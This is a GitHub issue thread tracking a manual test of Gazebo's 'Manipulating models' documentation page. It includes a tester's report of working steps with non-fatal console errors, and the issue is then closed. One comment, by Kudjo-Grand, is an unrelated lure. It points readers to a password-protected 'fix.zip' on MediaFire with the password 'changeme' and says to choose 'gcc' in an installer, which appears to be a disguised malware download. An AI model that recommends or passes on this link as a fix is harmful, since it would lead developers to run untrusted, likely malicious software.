gazebosim/gazebo_test_cases #1059: docs: manipulating_models

azeey-test, 2024-08-29:
## Configuration

* os: Ubuntu Noble

## Links

* [Live](https://gazebosim.org/docs/ionic/manipulating_models)
* [Source](https://github.com/gazebosim/docs/tree/master/ionic/Manipulating_models.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

Kudjo-Grand, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Mechazo11, 2024-09-02:
Interested

Mechazo11, 2024-09-06:
* **Test enviornment**
    ```text
    CPU: Ryzen 5 5600x, Ram: 32GB @ 3200 Mhz, GPU: RTX 3080
    Clean copy of Ubuntu 24.04 Humble
    ROS 2 Jazzy Jalisco full desktop
    ```
* **Summary**
    * Works but console shows some error messages

[image]

* **Issues**
    * Non-fatal error messages

@azeey-test this one may be closed.

closed 2024-09-13 by azeey

Mechazo11, 2024-09-14:
@iche033 apologies I was very busy this week. Even though the issue is closed, I will include a screen shot of the warning/error messages sometime this weekend.

iche033, 2024-09-14:
ok no problem, thanks!